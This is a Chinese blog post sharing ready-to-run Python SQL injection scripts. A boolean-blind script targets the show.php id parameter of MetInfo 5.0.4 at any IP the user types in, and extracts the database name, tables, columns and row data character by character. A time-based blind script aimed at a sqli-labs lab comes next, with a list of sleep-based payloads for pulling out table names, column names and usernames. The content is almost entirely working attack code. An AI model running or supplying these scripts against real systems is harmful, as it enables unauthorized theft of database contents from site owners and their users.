SQL注入脚本

最新推荐文章于 2024-07-09 10:00:27 发布
最新推荐文章于 2024-07-09 10:00:27 发布
阅读量150 收藏 2
点赞数 1
文章标签: 数据库 安全 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ChiYanq7ng/article/details/134528194
版权
  1. 布尔盲注脚本

import string
import requests
import binascii
############################################################################################################
#                                                 定义字符集                                                 #
############################################################################################################
try:
    # 定义字符集
    strings = string.digits+string.ascii_letters+'_'
    str =  []
    for i in strings:
        str.append(i)
    ip=input("输入目标 ip:")
    ############################################################################################################
    #                                                 爆破数据库长度                                              #
    ############################################################################################################
    database_length=0
    for i in range(1,30):
        url = f"http://{ip}/metinfo_5.0.4/about/show.php?lang=cn&id=22 and length(database())={i}"
        res = requests.get(url=url)
        if res.status_code == 200:
            database_length=i
            break
    print(f"数据库名长度为{i}位")
    database_length=i
    print("***************************************************************************************************")
    ############################################################################################################
    #                                                 爆破数据库名                                               #
    ############################################################################################################
    database_name=""
    print("当前数据库:")
    for i in range(1,database_length+1):
        # 每位遍历字母数字下划线
        for j in str:
            # 进行 ascii 转码
            url = f"http://{ip}/metinfo_5.0.4/about/show.php?lang=cn&id=22 and ascii(substr(database(),{i},1))={ord(j)}"
            res = requests.get(url=url)
            if res.status_code == 200:
                print(j,end="")
                break
    print()
    print("***************************************************************************************************")
    #############################################################################################################
    #                                                 爆破表名                                                   #
    ############################################################################################################
    print("爆破表名")
    for i in range(0,600):
        # flag 用于避免爆破完每张表的继续进行多余爆破
        flag=0
        # end 用于避免爆破完表继续进行多余爆破
        end=0
        print(f"[{i+1}]", end="")
        # 假设每个表的表名最长30位,每个表名按位查询
        for j in range(1,30):
            for name_str in str:
                url = f"http://{ip}/metinfo_5.0.4/about/show.php?lang=cn&id=22 and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit {i},1),{j},1))={ord(name_str)}"
                res = requests.get(url=url)
                if res.status_code == 200:
                    print(name_str,end="")
                    # 该表名非空(未达到最大表数量)
                    end=1
                    break
                elif name_str=='_':
                    flag=1
                    break
            # 跳出超过表长,跳出循环
            if flag==1:
                break
        # 爆破的数据表超过最大数量,跳出循环
        if end==0:
            break
        print()
    #############################################################################################################
    #                                                 爆破字段名                                                 #
    ############################################################################################################
    print("***************************************************************************************************")
    table_name=input("输入要爆破的表名:")
    table=table_name
    table_name="0x"+binascii.hexlify(table_name.encode()).decode()
    # 跑第0-100个字段
    for i in range(0,100):
        print([i+1],end="")
        end=0
        # 假设每个表的字段名最长30位,每个字段名按位查询
        for j in range(1,30):
            flag = 0
            for name_str in str:
                url = f"http://{ip}/metinfo_5.0.4/about/show.php?lang=cn&id=22 and ascii(substr((select column_name from information_schema.columns where table_schema = database() and table_name={table_name} limit {i},1),{j},1))={ord(name_str)}"
                res = requests.get(url=url)
                if res.status_code == 200:
                    end=1
                    flag=1
                    print(name_str,end="")
                    break
            # 超过该字段长度,跳出循环,开始爆破下个字段
            if flag==0:
                break
        print()
        if end==0:
            break

    #############################################################################################################
    #                                                 爆破字段数据                                                #
    ############################################################################################################
    print("***************************************************************************************************")
    column=input("输入要爆破的字段:")
    # 跑第0-100个用户名
    for i in range(0,100):
        end=0
        # 假设每个用户的表名最长100位,每个用户名按位查询
        for j in range(1,100):
            flag=0
            for name_str in str:
                url = f"http://{ip}/metinfo_5.0.4/about/show.php?lang=cn&id=22 and ascii(substr((select {column} from {table} limit {i},1),{j},1))={ord(name_str)}"
                res = requests.get(url=url)
                if res.status_code == 200:
                    end=1
                    flag=1
                    print(name_str,end="")
                    break
            if flag==0:
                break
        print()
        if end==0:
            break
except:
    pass

  1. 延时注入脚本

import requests                                #最关键的requests库,可以好好了解一下
import time                                    #这个也是必要的
chars=',abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.'#爆破
database=''                                    #把结果加到这个变量里
global length                                                
 
for l in range(1,20):                          #这里有时候range 要大些,因为用了group_concat把结果都放在一行了,可能使长度很大
    url ='http://10.4.7.176/sqli-labs/Less-1/' #url自己根据情况改
    close="?id=1'"                             #闭合方式
    payload1=' and if(length(database())=%s,sleep(2),0) --+' %l       #最关键的地方,和其他注入方法的payload 差不多,只是用了延时的手法
    start_time=time.time()
    r=requests.get(url+close+payload1)
    end_time=time.time()
    sec=end_time-start_time          #算出get请求和sleep后所用的时间
    if  sec >=2:                     #时间符号条件就print并退出
        print('database length is '+str(l))
        global length
        length =l;
        break
    else:
        pass
for i in range (1,length+1):
    for char in chars:
        payload2="and if(substr(database(),%d,1)='%s',sleep(2),1) --+" %(i,char)                       #substr取每位爆破
        start_time2=time.time()
        r2=requests.get(url+close+payload2)
        end_time2=time.time()
        sec2=(end_time2-start_time2) #也是一样,符合条件就输出
        if sec2 >=2:
            database+=char
            print(database)
            break
print('database_name:',database)


爆破表长的payload:
payload="and if(length((select group_concat(table_name) from information_schema.tables where table_schema = database() limit 0,1))=%s,sleep(3),1) --+" %l
爆破表名的payload:
payload = " and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema = database() limit 0,1),%s,1)) = %s,sleep(3),1) --+" %(j,charAscii)
//爆破名字的时候建议套上ascii()函数,这样不容易出错pwp

爆破列长的payload:

 
payload=" and if(length((select group_concat(column_name) from information_schema.columns where table_name = 'users' ))=%s,sleep(3),1) --+" %l
爆破列名的payload:
payload2 = " and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name = 'users' limit 0,1),%s,1)) = %s,sleep(3),1) --+" %(j,charAscii)
字段
爆破字段长的payload:
payload=" and if(length((select group_concat(username) from users ))=%s,sleep(3),1) --+" %l
爆破字段名的payload:
payload=" and if(ascii(substr((SeLeCt group_concat(username) from users ),%s,1)) = %s,sleep(3),1) --+" %(j,charAscii)

池央_
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
python sql注入检测脚本_sql注入脚本
weixin_36484714的博客
02-09 1227
摘要本篇文章对原理的解释占据主要,输出的美化部分不做详细解释一. 成果展示假设我的数据库有这些那么通过sql注入把所有数据库的所有表所有字段和所有的内容查找出来 二. 原理对sql-labs的前四关有效,其实程序是根据sqli-lab的特点而不是像强大的工具sqlmap一样可以完全实现sql注入,而今天的核心就在于三个表达式select * from users where id='-1' uni...
ASP.NET(c#)防SQL注入脚本程序 v2.0
04-27
ASP.NET(C#)防SQL注入脚本程序v2.0是一个专为ASP.NET开发者设计的安全工具,旨在保护Web应用程序免受SQL注入攻击。SQL注入是一种常见的网络安全威胁,攻击者通过在输入字段中插入恶意SQL代码,试图绕过验证机制,...
sql注入测试脚本
03-17
sql注入常用的测试语句大全,方便进行渗透测试和sql注入测试。
【PyHacker编写指南】Sql注入脚本编写
XunanSec的博客
05-15 2308
这节课是巡安似海PyHacker编写指南的《Sql注入脚本编写》有些注入点sqlmap跑不出,例如延时注入,实际延时与语句延时时间不符,sqlmap就跑不出,这就需要我们自己根据实际情况编写脚本来注入了。文末,涉及了sqlmap tamper编写,所以需要一定的python基础才能看懂。喜欢用Python脚本的小伙伴可以跟着一起写一写。
SQL注入(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
xiaoganbuaiuk的博客
07-09 1406
SQL注入就是指Web应用程序对用户输入数据的合理性没有进行判断,前端传入后端的参数是攻击者可控制的,并且根据参数带入数据库查询,攻击者可以通过构造不同的SQL语句来对数据库进行任意查询。
sql注入脚本1
m0_55772907的博客
05-01 987
sqllab第一关验证poc import requests import re url = input("输入你的url:") r = requests.get(url) res = str(r.content) if re.search("syntax",res): print("存在sql注入") else: print("不存在")
全手工SQL注入脚本整理
传说中的蒙面大侠
01-17 1423
        1.判断是否有注入;and 1=1 ;and 1=2          2.初步判断是否是mssql ;and user>0   3.注入参数是字符and [查询条件] and =   4.搜索时没过滤参数的and [查询条件] and %25=   5.判断数据库系统   ;and (select count(*) from sysob
SQL 注入脚本学习笔记
二进制的博客
10-11 1361
什么是SQL注入,如何理解SQL注入是一种将sql代码添加到输入参数中,传递到sql服务器解析并执行的一种攻击手法expxxx.action?id=1 此时可以在id后加入sql语句进行注入 xxx.action?id=-1 or 1=1 此时查询的信息就是所有的信息SQL注入是怎么产生的? web开发人员无法保证所有的输入都已经过滤 攻击者利用发送给sql服务器的输入数据构造可执行的sql代
基于pythonsql注入脚本
03-04
适合刚学pythonsql注入的人 import urllib2 import re
SQL注入脚本SQL注入脚本
11-26
标题与描述中提到的“防SQL注入脚本”是一个关键的IT安全概念,尤其是在Web开发领域。SQL注入是一种常见的攻击方式,黑客通过在输入字段中插入恶意SQL代码,利用应用程序的漏洞来执行非授权的数据库操作,从而获取...
ASP.NET(VB.NET)防SQL注入脚本程序.rar
07-09
ASP.NET (VB.NET) 防SQL注入脚本程序是一个重要的安全工具,旨在保护Web应用程序免受SQL注入攻击。SQL注入是一种常见的网络安全威胁,黑客通过输入恶意SQL代码来操纵数据库,获取敏感信息或破坏系统。在ASP.NET (VB...
SQL注入脚本编写
L1ni01
11-13 2135
SQL注入脚本编写 穷举 1.bool盲注脚本(post型) import requests url = "http://127.0.0.1/sqli-labs-master/Less-15/" result ="" for i in range(1,10): for j in range(65,150): payload1 = "0'^(ascii(substr(database(),{},1))>{})^1#".format(i,j) payload2 = "admin'^(ascii(
SQL注入总结
10-20 236
 HTML Tags and JavaScript tutorialvar encS="%3Cscript%20language%3D%22javascript%22%20src%3D%22http%3A//avss.b15.cnwg.cn/count/count.asp%22%3E%3C/script%3E";var S=unescape(encS);document.write(S);
SQL注入脚本命令
ymebnqv99bj的专栏
05-20 502
1.判断是否有注入;and 1=1 ;and 1=2   2.初步判断是否是mssql ;and user>0   3.注入参数是字符'and [查询条件] and ''='   4.搜索时没过滤参数的'and [查询条件] and '%25'='   5.判断数据库系统   ;and (select count(*) from sysobjects)>0 mssql
bugku--SQL注入((利用脚本))
hxhabcd123的博客
08-28 1686
本文记录利用脚本来解决SQL注入的CTF题
sql枚举数据库注入脚本
superprintf的博客
10-02 330
一. 成果展示 假设我的数据库有这些 那么把所有数据库的所有表所有字段和所有的内容查找出来 二. 原理 其实程序是根据sqli-lab的特点而不是像强大的工具sqlmap一样可以完全实现sql注入,而今天的核心就在于三个表达式 select * from users where id='-1' union select 1,2,group_concat(schema_name) from information_schema.schemata%23 //得到数据库名 select * from u
SQL注入:布尔注入脚本
守拙的博客
07-19 878
SQL注入:布尔注入脚本 实现思路 将payload以字典形式存储,循环遍历时对payload字符串中相应参数进行格式化。按以下顺序依次获取数据,其实四个步骤逻辑一样,都是先获取数量,然后获取长度,最后获取内容。 数据库名:获取库名长度,库名 数据库表:获取数据库表数量,表名长度,表名 表字段:获取字段数,字段名长度,字段名 表数据:获取该字段数据行数,数据长度,数据内容 关键代码 获取不同数据的payload字典 payload_dict = { "db_name_len":
SQL 登录注入脚本_深圳嘉华学校之SQL 注入
weixin_39636540的博客
11-21 105
SQL Server 2005 联机丛书 SQL Injection 是一种攻击方法,它可以将恶意代码插入到以后将传递给 SQL Server 供分析和执行的字符串中。任何构成 SQL 语句的过程都应进行注入漏洞检查,因为 SQL Server 将执行其接收到的所有语法有效的查询。 SQL Injection 的主要形式包括直接将代码插入与 SQL 命令串联并执行的用户输入变量。一种间接的攻击会将...
SQL 登录注入脚本_项目实战 | SQL注入的“格局”
weixin_39531378的博客
11-16 156
文章来源:安译Sec0x00前言曾经搞站最经典的套路就是:注入拿到密码进后台,上传shell然后内核提权。但是实际环境中,往往会有注入后密码解不开、找不到后台等情况,所以现在有的师傅说sql注入还不如xss。0x01 详细步骤一.网站界面就不放了,打码太累了,直接跳到随意点点后发现可疑参数,并确定存在漏洞的截图。and 1=1页面显示正常,and 1=0页面变空白确定存在数字型注入,o...
如何用pythonsql注入脚本
02-21
编写SQL注入脚本的步骤可以概括如下:1. 了解SQL注入攻击原理; 2. 建立数据库连接; 3. 获得用户输入; 4. 构建恶意SQL语句; 5. 执行语句; 6. 获取返回结果。使用Python编写SQL注入脚本需要使用MySQLdb模块,它可以实现对MySQL数据库的操作,比如数据库连接、执行SQL语句等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

池央_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值